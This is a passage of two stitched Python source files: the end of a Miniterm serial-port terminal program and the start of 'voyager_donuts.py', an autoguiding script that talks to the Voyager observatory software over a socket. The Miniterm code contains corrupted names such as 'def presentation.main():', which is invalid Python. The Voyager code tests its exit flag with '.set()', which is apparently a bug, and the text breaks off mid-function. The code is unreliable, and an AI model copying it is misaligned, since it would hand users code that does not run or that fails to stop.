new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = os.read(self.fd, 1)
return c
def cleanup(self):
if self.old is not None:
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
console = Console()
def cleanup_console():
console.cleanup()
sys.exitfunc = cleanup_console # terminal modes have to be restored on exit...
else:
raise NotImplementedError("Sorry no implementation for your platform (%s) available." % sys.platform)
def dump_port_list():
if comports:
sys.stderr.write('\n--- Available ports:\n')
for port, desc, hwid in sorted(comports()):
#~ sys.stderr.write('--- %-20s %s [%s]\n' % (port, desc, hwid))
sys.stderr.write('--- %-20s %s\n' % (port, desc))
CONVERT_CRLF = 2
CONVERT_CR = 1
CONVERT_LF = 0
NEWLINE_CONVERISON_MAP = (LF, CR, CRLF)
LF_MODES = ('LF', 'CR', 'CR/LF')
REPR_MODES = ('raw', 'some control', 'all control', 'hex')
class Miniterm(object):
def __init__(self, port, baudrate, parity, rtscts, xonxoff, echo=False, convert_outgoing=CONVERT_CRLF, repr_mode=0):
try:
self.serial = serial.serial_for_url(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
self.serial = serial.Serial(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
self.echo = echo
self.repr_mode = repr_mode
self.convert_outgoing = convert_outgoing
self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
self.dtr_state = True
self.rts_state = True
self.break_state = False
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader)
self.receiver_thread.setDaemon(True)
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
self.receiver_thread.join()
def start(self):
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer)
self.transmitter_thread.setDaemon(True)
self.transmitter_thread.start()
def stop(self):
self.alive = False
def join(self, transmit_only=False):
self.transmitter_thread.join()
if not transmit_only:
self.receiver_thread.join()
def dump_port_settings(self):
sys.stderr.write("\n--- Settings: %s %s,%s,%s,%s\n" % (
self.serial.portstr,
self.serial.baudrate,
self.serial.bytesize,
self.serial.parity,
self.serial.stopbits))
sys.stderr.write('--- RTS: %-8s DTR: %-8s BREAK: %-8s\n' % (
(self.rts_state and 'active' or 'inactive'),
(self.dtr_state and 'active' or 'inactive'),
(self.break_state and 'active' or 'inactive')))
try:
sys.stderr.write('--- CTS: %-8s DSR: %-8s RI: %-8s CD: %-8s\n' % (
(self.serial.getCTS() and 'active' or 'inactive'),
(self.serial.getDSR() and 'active' or 'inactive'),
(self.serial.getRI() and 'active' or 'inactive'),
(self.serial.getCD() and 'active' or 'inactive')))
except serial.SerialException:
# on RFC 2217 ports it can happen to no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: %s\n' % (self.serial.xonxoff and 'active' or 'inactive'))
sys.stderr.write('--- hardware flow control: %s\n' % (self.serial.rtscts and 'active' or 'inactive'))
sys.stderr.write('--- data escaping: %s linefeed: %s\n' % (
REPR_MODES[self.repr_mode],
LF_MODES[self.convert_outgoing]))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
data = character(self.serial.read(1))
if self.repr_mode == 0:
# direct output, just have to care about newline setting
if data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(data)
elif self.repr_mode == 1:
# escape non-printable, let pass newlines
if self.convert_outgoing == CONVERT_CRLF and data in '\r\n':
if data == '\n':
sys.stdout.write('\n')
elif data == '\r':
pass
elif data == '\n' and self.convert_outgoing == CONVERT_LF:
sys.stdout.write('\n')
elif data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 2:
# escape all non-printable, including newline
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 3:
# escape everything (hexdump)
for c in data:
sys.stdout.write("%s " % c.encode('hex'))
sys.stdout.flush()
except serial.SerialException, e:
self.alive = False
# would be nice if the console reader could be interruptted at this
# point...
raise
def writer(self):
"""\
Loop and copy console->serial until EXITCHARCTER character is
found. When MENUCHARACTER is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
b = console.getkey()
except KeyboardInterrupt:
b = serial.to_bytes([3])
c = character(b)
if menu_active:
if c == MENUCHARACTER or c == EXITCHARCTER: # Menu character again/exit char -> send itself
self.serial.write(b) # send character
if self.echo:
sys.stdout.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
console.cleanup()
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
file = open(filename, 'r')
sys.stderr.write('--- Sending file %s ---\n' % filename)
while True:
line = file.readline().rstrip('\r\n')
if not line:
break
self.serial.write(line)
self.serial.write('\r\n')
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File %s sent ---\n' % filename)
except IOError, e:
sys.stderr.write('--- ERROR opening file %s: %s ---\n' % (filename, e))
console.setup()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.rts_state = not self.rts_state
self.serial.setRTS(self.rts_state)
sys.stderr.write('--- RTS %s ---\n' % (self.rts_state and 'active' or 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.dtr_state = not self.dtr_state
self.serial.setDTR(self.dtr_state)
sys.stderr.write('--- DTR %s ---\n' % (self.dtr_state and 'active' or 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.break_state = not self.break_state
self.serial.setBreak(self.break_state)
sys.stderr.write('--- BREAK %s ---\n' % (self.break_state and 'active' or 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo %s ---\n' % (self.echo and 'active' or 'inactive'))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
elif c == '\x01': # CTRL+A -> cycle escape mode
self.repr_mode += 1
if self.repr_mode > 3:
self.repr_mode = 0
sys.stderr.write('--- escape data: %s ---\n' % (
REPR_MODES[self.repr_mode],
))
elif c == '\x0c': # CTRL+L -> cycle linefeed mode
self.convert_outgoing += 1
if self.convert_outgoing > 2:
self.convert_outgoing = 0
self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
sys.stderr.write('--- line feed %s ---\n' % (
LF_MODES[self.convert_outgoing],
))
elif c in 'pP': # P -> change port
dump_port_list()
sys.stderr.write('--- Enter port name: ')
sys.stderr.flush()
console.cleanup()
try:
port = sys.stdin.readline().strip()
except KeyboardInterrupt:
port = None
console.setup()
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
new_serial = serial.Serial()
new_serial.port = port
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.open()
new_serial.setRTS(self.rts_state)
new_serial.setDTR(self.dtr_state)
new_serial.setBreak(self.break_state)
except Exception, e:
sys.stderr.write('--- ERROR opening new port: %s ---\n' % (e,))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: %s ---\n' % (self.serial.port,))
# and restart the reader thread
self._start_reader()
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
console.cleanup()
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError, e:
sys.stderr.write('--- ERROR setting baudrate: %s ---\n' % (e,))
self.serial.baudrate = backup
else:
self.dump_port_settings()
console.setup()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character %s --\n' % key_description(c))
menu_active = False
elif c == MENUCHARACTER: # next char will be for menu
menu_active = True
elif c == EXITCHARCTER:
self.stop()
break # exit app
elif c == '\n':
self.serial.write(self.newline) # send newline character(s)
if self.echo:
sys.stdout.write(c) # local echo is a real newline in any case
sys.stdout.flush()
else:
self.serial.write(b) # send byte
if self.echo:
sys.stdout.write(c)
sys.stdout.flush()
except:
self.alive = False
raise
def presentation.main():
import optparse
parser = optparse.OptionParser(
usage = "%prog [options] [port [baudrate]]",
description = "Miniterm - A simple terminal program for the serial port."
)
group = optparse.OptionGroup(parser, "Port settings")
group.add_option("-p", "--port",
dest = "port",
help = "port, a number or a presentation.device name. (deprecated option, use parameter instead)",
default = DEFAULT_PORT
)
group.add_option("-b", "--baud",
dest = "baudrate",
action = "store",
type = 'int',
help = "set baud rate, default %default",
default = DEFAULT_BAUDRATE
)
group.add_option("--parity",
dest = "parity",
action = "store",
help = "set parity, one of [N, E, O, S, M], default=N",
default = 'N'
)
group.add_option("--rtscts",
dest = "rtscts",
action = "store_true",
help = "enable RTS/CTS flow control (default off)",
default = False
)
group.add_option("--xonxoff",
dest = "xonxoff",
action = "store_true",
help = "enable software flow control (default off)",
default = False
)
group.add_option("--rts",
dest = "rts_state",
action = "store",
type = 'int',
help = "set initial RTS line state (possible values: 0, 1)",
default = DEFAULT_RTS
)
group.add_option("--dtr",
dest = "dtr_state",
action = "store",
type = 'int',
help = "set initial DTR line state (possible values: 0, 1)",
default = DEFAULT_DTR
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Data handling")
group.add_option("-e", "--echo",
dest = "echo",
action = "store_true",
help = "enable local echo (default off)",
default = False
)
group.add_option("--cr",
dest = "cr",
action = "store_true",
help = "do not send CR+LF, send CR only",
default = False
)
group.add_option("--lf",
dest = "lf",
action = "store_true",
help = "do not send CR+LF, send LF only",
default = False
)
group.add_option("-D", "--debug",
dest = "repr_mode",
action = "count",
help = """debug received data (escape non-printable chars)
--debug can be given multiple times:
0: just print what is received
1: escape non-printable characters, do newlines as unusual
2: escape non-printable characters, newlines too
3: hex dump everything""",
default = 0
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Hotkeys")
group.add_option("--exit-char",
dest = "exit_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to exit the application",
default = 0x1d
)
group.add_option("--menu-char",
dest = "menu_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to control miniterm (menu)",
default = 0x14
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Diagnostics")
group.add_option("-q", "--quiet",
dest = "quiet",
action = "store_true",
help = "suppress non-error messages",
default = False
)
parser.add_option_group(group)
(options, args) = parser.parse_args()
options.parity = options.parity.upper()
if options.parity not in 'NEOSM':
parser.error("invalid parity")
if options.cr and options.lf:
parser.error("only one of --cr or --lf can be specified")
if options.menu_char == options.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
global EXITCHARCTER, MENUCHARACTER
EXITCHARCTER = chr(options.exit_char)
MENUCHARACTER = chr(options.menu_char)
port = options.port
baudrate = options.baudrate
if args:
if options.port is not None:
parser.error("no arguments are allowed, options only when --port is given")
port = args.pop(0)
if args:
try:
baudrate = int(args[0])
except ValueError:
parser.error("baud rate must be a number, not %r" % args[0])
args.pop(0)
if args:
parser.error("too many arguments")
else:
# noport given on command line -> ask user now
if port is None:
dump_port_list()
port = raw_input('Enter port name:')
convert_outgoing = CONVERT_CRLF
if options.cr:
convert_outgoing = CONVERT_CR
elif options.lf:
convert_outgoing = CONVERT_LF
try:
miniterm = Miniterm(
port,
baudrate,
options.parity,
rtscts=options.rtscts,
xonxoff=options.xonxoff,
echo=options.echo,
convert_outgoing=convert_outgoing,
repr_mode=options.repr_mode,
)
except serial.SerialException, e:
sys.stderr.write("could not open port %r: %s\n" % (port, e))
sys.exit(1)
if not options.quiet:
sys.stderr.write('--- Miniterm on %s: %d,%s,%s,%s ---\n' % (
miniterm.serial.portstr,
miniterm.serial.baudrate,
miniterm.serial.bytesize,
miniterm.serial.parity,
miniterm.serial.stopbits,
))
sys.stderr.write('--- Quit: %s | Menu: %s | Help: %s followed by %s ---\n' % (
key_description(EXITCHARCTER),
key_description(MENUCHARACTER),
key_description(MENUCHARACTER),
key_description('\x08'),
))
if options.dtr_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing DTR %s\n' % (options.dtr_state and 'active' or 'inactive'))
miniterm.serial.setDTR(options.dtr_state)
miniterm.dtr_state = options.dtr_state
if options.rts_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing RTS %s\n' % (options.rts_state and 'active' or 'inactive'))
miniterm.serial.setRTS(options.rts_state)
miniterm.rts_state = options.rts_state
console.setup()
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not options.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
#~ console.cleanup()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
presentation.main()
|
voyager_donuts.py | """
Test script for guiding Voyager with donuts
"""
import sys
import socket as s
import traceback
import time
import threading
import logging
import queue
import json
import uuid
import signal
import argparse as ap
from datetime import datetime
from shutil import copyfile
from collections import defaultdict
import numpy as np
from astropy.io import fits
from donuts import Donuts
import voyager_utils as vutils
import voyager_db as vdb
from PID import PID
# TODO: Add RemoteActionAbort call when things go horribly wrong
# pylint: disable=line-too-long
# pylint: disable=invalid-name
# pylint: disable=logging-fstring-interpolation
# pylint: disable=too-few-public-methods
# pylint: disable=too-many-statements
# pylint: disable=too-many-branches
# pylint: disable=too-many-locals
# pylint: disable=too-many-nested-blocks
# pylint: disable=too-many-lines
# pylint: disable=too-many-instance-attributes
# pylint: disable=broad-except
def arg_parse():
"""
Parse the command line arguments
"""
p = ap.ArgumentParser()
p.add_argument('config',
help='path to config file')
return p.parse_args()
# set this when ctrl+c happens, then exit cleanly
EXIT_EVENT = threading.Event()
class DonutsStatus():
"""
Current status of Donuts guiding
"""
CALIBRATING, GUIDING, IDLE, UNKNOWN = np.arange(4)
class Message():
"""
Define some dicts for specific Voyager two way commands
Also define some flags to compare responses from Voyager's
RemoteActionResult ActionResultInt to.
"""
NEED_INIT = 0
READY = 1
RUNNING = 2
PAUSE = 3
OK = 4
FINISHED_ERROR = 5
ABORTING = 6
ABORTED = 7
TIMEOUT = 8
TIME_END = 9
OK_PARTIAL = 10
@staticmethod
def pulse_guide(uid, idd, direction, duration):
"""
Create a message object for pulse guiding
Also return the response code that says things
went well. Typically 4
Parameters
----------
uid : string
unique ID for this command
idd : int
unique ID for this command
direction : dict
X and Y directional information for a correction
duration : dict
X and Y pulse guide durations for a correction
Returns
-------
message : dict
JSON dumps ready dict for a pulse guide command
Raises
------
None
"""
message = {"method": "RemotePulseGuide",
"params": {"UID": uid,
"Direction": direction,
"Duration": duration,
"Parallelized": "true"},
"id": idd}
return message
@staticmethod
def camera_shot(uid, idd, exptime, save_file, filename):
"""
Create a message object for taking an image
with the CCD camera
Also return the response code that says things
went well. Typically 4
Parameters
----------
uid : string
unique ID for this command
idd : int
unique ID for this command
exptime : int
exposure time of the image to be taken
save_file : boolean
flag to save the file or not
filename : string
path to the file for saving
Returns
-------
message : dict
JSON dumps ready dict for a pulse guide command
Raises
------
None
"""
message = {"method": "RemoteCameraShot",
"params": {"UID": uid,
"Expo": exptime,
"Bin": 1,
"IsROI": "false",
"ROITYPE": 0,
"ROIX": 0,
"ROIY": 0,
"ROIDX": 0,
"ROIDY": 0,
"FilterIndex": 3,
"ExpoType": 0,
"SpeedIndex": 0,
"ReadoutIndex": 0,
"IsSaveFile": str(save_file).lower(),
"FitFileName": filename,
"Gain": 1,
"Offset": 0,
"Parallelized": "true"},
"id": idd}
return message
@staticmethod
def goto_radec(uid, idd, ra, dec):
"""
Create a message object for repointing the telescope
Parameters
----------
uid : string
unique ID for this command
idd : int
unique ID for this command
ra : string
RA of the target field (HH MM SS.ss)
dec : string
DEC of the target field (DD MM SS.ss)
Returns
-------
message : dict
JSON dumps ready dict for a pulse guide command
Raises
------
None
"""
message = {"method": "RemotePrecisePointTarget",
"params": {"UID": uid,
"IsText": "true",
"RA": 0,
"DEC": 0,
"RAText": ra,
"DECText": dec,
"Parallelized": "true"},
"id": idd}
return message
class Response():
"""
Keep track of outstanding responses from Voyager
"""
def __init__(self, uid, idd, ok_status):
"""
Initialise response object
Parameters
----------
uid : string
unique ID for this command
idd : int
unique ID for this command
ok_staus : int
command return value that we search for
to ensure everything went ok. Any other
value means there was an error
"""
self.uid = uid
self.idd = idd
self.uid_recv = False
self.idd_recv = False
self.uid_status = None
self.idd_status = None
self.ok_status = ok_status
def uid_received(self, status):
"""
Update uuid response as received
Parameters
----------
status : int
response code to command for given uid
Returns
-------
None
Raises
------
None
"""
self.uid_recv = True
self.uid_status = status
def idd_received(self, status):
"""
Update uuid response as received
Parameters
----------
status : int
response code to command for given idd
Returns
-------
Raises
------
None
"""
self.idd_recv = True
self.idd_status = status
def all_ok(self):
"""
Check if uid and idd are all ok
Return True if so and False if not
idd is left hardcoded to 0
uid code is supplied on init
Parameters
----------
None
Returns
-------
all_ok : boolean
Did we get a good response for the command submitted?
True of False
Raises
------
None
"""
return self.uid_recv and self.idd_recv and \
self.uid_status == self.ok_status and self.idd_status == 0
class Voyager():
"""
Voyager interaction class
"""
def __init__(self, config):
"""
Initialise the Voyager autoguiding class instance
Parameters
----------
config : dict
Configuration information
"""
self.socket = None
self.socket_ip = config['socket_ip']
self.socket_port = config['socket_port']
self.host = config['host']
self.inst = 1
self.image_extension = config['image_extension']
# Fits image path keyword
self._voyager_path_keyword = "FITPathAndName"
self._INFO_SIGNALS = ["Polling", "Version", "Signal", "NewFITReady"]
# set up important image header keywords
self.filter_keyword = config['filter_keyword']
self.field_keyword = config['field_keyword']
self.ra_keyword = config['ra_keyword']
self.dec_keyword = config['dec_keyword']
self.xbin_keyword = config['xbin_keyword']
self.ybin_keyword = config['ybin_keyword']
self.ra_axis = config['ra_axis']
self._declination = None
# keep track of current status
self._status = DonutsStatus.UNKNOWN
# add a message object for sharing between methods
self._msg = Message()
# create an overflow for message receiving, not sure if needed, but added just in case
self.message_overflow = []
# some internal tracking variables
self._image_id = 0
self._comms_id = 0
self._last_poll_time = None
# set up the guiding thread
self._latest_guide_frame = None
self._guide_condition = threading.Condition()
# set up a queue to send back results from guide_loop
self._results_queue = queue.Queue(maxsize=1)
# set up some root directory info for host and container
self.calibration_root = config['calibration_root']
self.reference_root = config['reference_root']
self.data_root = config['data_root']
self.calibration_root_host = config['calibration_root_host']
self.reference_root_host = config['reference_root_host']
self.data_root_host = config['data_root_host']
# this calibration directory inside calibration root gets made if we calibrate
self._calibration_dir = None
self._calibration_results_path = None
self.calibration_step_size_ms = config['calibration_step_size_ms']
self.calibration_n_iterations = config['calibration_n_iterations']
self.calibration_exptime = config['calibration_exptime']
# set up objects to hold calibration info
self._direction_store = None
self._scale_store = None
# add some places to keep track of reference images change overs
self._ref_file = None
self._last_field = None
self._last_filter = None
self._last_xbin = None
self._last_ybin = None
self._donuts_ref = None
# set up the PID loop coeffs etc
self.pid_x_p = config["pid_coeffs"]["x"]["p"]
self.pid_x_i = config["pid_coeffs"]["x"]["i"]
self.pid_x_d = config["pid_coeffs"]["x"]["d"]
self.pid_x_setpoint = config["pid_coeffs"]["set_x"]
self.pid_y_p = config["pid_coeffs"]["y"]["p"]
self.pid_y_i = config["pid_coeffs"]["y"]["i"]
self.pid_y_d = config["pid_coeffs"]["y"]["d"]
self.pid_y_setpoint = config["pid_coeffs"]["set_y"]
# placeholders for actual PID objects
self._pid_x = None
self._pid_y = None
# ag correction buffers - used for outlier rejection
self.guide_buffer_length = config["guide_buffer_length"]
self.guide_buffer_sigma = config["guide_buffer_sigma"]
self._buff_x = None
self._buff_y = None
self._buff_x_sigma = None
self._buff_y_sigma = None
# set up max error in pixels
self.max_error_pixels = config['max_error_pixels']
# set up stabilisation
self._stabilised = False
# set up how many attempts to stabilise are allowed
self.n_images_to_stabilise = config['n_images_to_stabilise']
# initialise stabilisation counter
self._images_to_stabilise = self.n_images_to_stabilise
# calibrated pixels to time ratios and the directions
self.pixels_to_time = config['pixels_to_time']
self.guide_directions = config['guide_directions']
# initialise all the things
self.__initialise_guide_buffer()
# start with the guider unstabilised
self.__initialise_pid_loop(stabilised=False)
# some donuts algorithm config
self.donuts_subtract_bkg = config['donuts_subtract_bkg']
def __resolve_host_path(self, data_type, path):
"""
Take in a path from Voyager which is absolute on
the container. We need a path to the volume on the
host instead.
Data are mounted to self.data_root_host
Refs are mounted to self.reference_root_host
Donuts calibs are mounted to self.calibration_root_host
Logs are mounted to self.logging_root_host
Parameters
----------
data_type : string
which type of data are we working with?
data, calib or references?
path : string
host path to image
Returns
-------
cont_path : string
host path as seen from inside the container
Raises
------
None
"""
# fetch the image name form the full path
filename = path.split('/')[-1]
# get tonight, break path on this string
night = vutils.get_tonight()
if data_type == "data":
cont_root = self.data_root_host
cont_path = f"{cont_root}\\{night}\\{filename}"
elif data_type == "calib":
cont_root = self.calibration_root_host
cont_path = f"{cont_root}\\{night}\\{filename}"
else:
cont_root = self.reference_root_host
cont_path = f"{cont_root}\\{filename}"
return cont_path
def __resolve_container_path(self, data_type, path):
"""
Take in a path from Voyager which is absolute on
the host machine. We need a path to the volume inside
the Docker container.
Data are mounted to self.data_root
Refs are mounted to self.reference_root
Donuts calibs are mounted to self.calibration_root
Logs are mounted to self.logging_root
Parameters
----------
data_type : string
which type of data are we working with?
data, calib or references?
path : string
host path to image
Returns
-------
cont_path : string
host path as seen from inside the container
Raises
------
None
"""
# fetch the image name form the full path
filename = path.split('\\')[-1]
# get tonight, break path on this string
night = vutils.get_tonight()
if data_type == "data":
cont_root = self.data_root
cont_path = f"{cont_root}/{night}/{filename}"
elif data_type == "calib":
cont_root = self.calibration_root
cont_path = f"{cont_root}/{night}/{filename}"
else:
cont_root = self.reference_root
cont_path = f"{cont_root}/{filename}"
return cont_path
def run(self):
"""
Open a connection and maintain it with Voyager.
Listen to autoguiding and calibration jobs.
Dispatch them and continue listening until
told to abort.
Parameters
----------
None
Returns
-------
None
Raises
------
None
"""
# spawn the guide calculation thread
guide_thread = threading.Thread(target=self.__guide_loop)
guide_thread.daemon = True
guide_thread.start()
# open the socket to Voyager
self.__open_socket()
# keep it alive and listen for jobs
self.__keep_socket_alive()
# set guiding statuse to IDLE
self._status = DonutsStatus.IDLE
# loop until told to stop
while 1:
# end on ctrl+c
if EXIT_EVENT.set():
break
# listen for a response or a new job to do
rec = self.__receive_until_delim()
# was there a command? If so, do something, else, do nothing/keep alive
if rec:
# handle events
if 'Event' in rec.keys():
# do nothing for events that just give us some info
if rec['Event'] in self._INFO_SIGNALS:
logging.debug(f"RECEIVED: {rec}")
# handle the autoguider calibration event
elif rec['Event'] == "DonutsCalibrationRequired":
# send a dummy command with a small delay for now
self._status = DonutsStatus.CALIBRATING
self.__send_donuts_message_to_voyager("DonutsCalibrationStart")
# run the calibration process
self.__calibrate_donuts()
# send the calibration done message
self.__send_donuts_message_to_voyager("DonutsCalibrationDone")
self._status = DonutsStatus.IDLE
# handle the autoguiding event
elif rec['Event'] == "DonutsRecenterRequired":
logging.debug(f"RECEIVED: {rec}")
# if guider is IDLE, do stuff, otherwise do nothing
if self._status == DonutsStatus.IDLE:
# set the current mode to guiding
self._status = DonutsStatus.GUIDING
# send a DonutsRecenterStart reply
self.__send_donuts_message_to_voyager("DonutsRecenterStart")
# make a containerised version of the file path and
# keep a local copy of the image to guide on's path
host_path = rec[self._voyager_path_keyword]
last_image = self.__resolve_container_path("data", host_path)
# set the latest image and notify the guide loop thread to wake up
with self._guide_condition:
self._latest_guide_frame = last_image
self._guide_condition.notify()
# fetch the results from the queue
direction, duration = self._results_queue.get()
# only try guiding if a valid correction was returned, otherwise, do nothing
if duration['x'] != 0 or duration['y'] != 0:
logging.info(f"CORRECTION: {direction['x']}:{duration['x']} {direction['y']}:{duration['y']}")
# send a pulseGuide command followed by a loop for responses
# this must be done before the next command can be sent
# if both are sent ok, we send the DonutsRecenterDone, otherwise we send an error
try:
# make x correction message
uuid_x = str(uuid.uuid4())
message_x = self._msg.pulse_guide(uuid_x, self._comms_id, direction['x'], duration['x'])
# send x correction
self.__send_two_way_message_to_voyager(message_x)
self._comms_id += 1
# make y correction message
uuid_y = str(uuid.uuid4())
message_y = self._msg.pulse_guide(uuid_y, self._comms_id, direction['y'], duration['y'])
# send the y correction
self.__send_two_way_message_to_voyager(message_y)
self._comms_id += 1
# send a DonutsRecenterDone message
self.__send_donuts_message_to_voyager("DonutsRecenterDone")
except Exception:
# send a recentering error
self.__send_donuts_message_to_voyager("DonutsRecenterError", f"Failed to PulseGuide {last_image}")
traceback.print_exc()
else:
logging.info(f"No guide correction returned for {last_image}, skipping and sending DonutsRecenterDone...")
# send a DonutsRecenterDone message
self.__send_donuts_message_to_voyager("DonutsRecenterDone")
# set the current mode back to IDLE
self._status = DonutsStatus.IDLE
# ignore commands if we're already doing something
else:
logging.warning("Donuts is busy, skipping...")
# send Voyager a start and a done command to keep it happy
self.__send_donuts_message_to_voyager("DonutsRecenterStart")
self.__send_donuts_message_to_voyager("DonutsRecenterDone")
# handle the abort event
elif rec['Event'] == "DonutsAbort":
logging.info(f"RECEIVED: {rec}")
logging.info("EVENT: Donuts abort requested, dying peacefully")
# close the socket
self.__close_socket()
# exit
sys.exit(0)
# erm, something has gone wrong
else:
logging.error('Oh dear, something unforseen has occurred. Here\'s what...')
logging.error(f"Failed parsing {rec}")
# do we need to poll again?
now = time.time()
time_since_last_poll = now - self._last_poll_time
if time_since_last_poll > 5:
# ping the keep alive
self.__keep_socket_alive()
@staticmethod
def __dec_str_to_deg(declination):
"""
Convert DD MM SS.ss into DD.dddd
"""
d, m, s = declination.split(' ')
if d[0] == '-':
return int(d) - float(m)/60. - float(s)/3600.
else:
return int(d) + float(m)/60. + float(s)/3600.
def __guide_loop(self):
"""
Analyse incoming images for guiding offsets.
Results are communicated to the main run thread
using the results_queue
Parameters
----------
None
Returns
-------
None
Raises
------
None
"""
while 1:
# end on ctrl+c
if EXIT_EVENT.set():
break
# block until a frame is available for processing
with self._guide_condition:
while self._latest_guide_frame is None:
self._guide_condition.wait()
last_image = self._latest_guide_frame
# check if we're still observing the same field
# pylint: disable=no-member
with fits.open(last_image) as ff:
# current field and filter?
current_filter = ff[0].header[self.filter_keyword]
current_field = ff[0].header[self.field_keyword]
current_xbin = ff[0].header[self.xbin_keyword]
current_ybin = ff[0].header[self.ybin_keyword]
declination = ff[0].header[self.dec_keyword]
self._declination = self.__dec_str_to_deg(declination)
# pylint: enable=no-member
# if something changes or we haven't started yet, sort out a reference image
if current_field != self._last_field or current_filter != self._last_filter or \
current_xbin != self._last_xbin or current_ybin != self._last_ybin or self._donuts_ref is None:
# reset PID loop to unstabilised state
self.__initialise_pid_loop(stabilised=False)
# reset the guide buffer
self.__initialise_guide_buffer()
# reset stabilised flag
self._stabilised = False
# replacement block using database
# look for a reference image for this field, filter, binx and biny
self._ref_file = vdb.get_reference_image_path(current_field, current_filter,
current_xbin, current_ybin)
# if we have a reference, use it. Otherwise store this image as the new reference frame
if self._ref_file is not None:
do_correction = True
else:
# set the last image as reference
self._ref_file = last_image
ref_filename = self._ref_file.split('/')[-1]
# copy it to the special storage area
copyfile(self._ref_file, f"{self.reference_root}/{ref_filename}")
# set thw copied image to the reference in the database
vdb.set_reference_image(self._ref_file, current_field, current_filter,
current_xbin, current_ybin)
# set skip correction as new reference was just defined as this current image
do_correction = False
# make this image the reference, update the last field/filter also
self._donuts_ref = Donuts(self._ref_file, subtract_bkg=self.donuts_subtract_bkg)
else:
do_correction = True
# update the last field/filter values
self._last_field = current_field
self._last_filter = current_filter
self._last_xbin = current_xbin
self._last_ybin = current_ybin
# do the correction if required
if do_correction:
# work out shift here
shift = self._donuts_ref.measure_shift(last_image)
logging.info(f"Raw shift measured: x:{shift.x.value:.2f} y:{shift.y.value:.2f}")
# process the shifts and add the results to the queue
direction, duration = self.__process_guide_correction(shift)
# add the post-PID values to the results queue
self._results_queue.put((direction, duration))
else:
# return a null correction and do nothing
direction = {"x": self.guide_directions["+x"],
"y": self.guide_directions["+y"]}
duration = {"x": 0, "y": 0}
self._results_queue.put((direction, duration))
# set this to None for the next image
self._latest_guide_frame = None
def __open_socket(self):
"""
Open a socket connection to Voyager
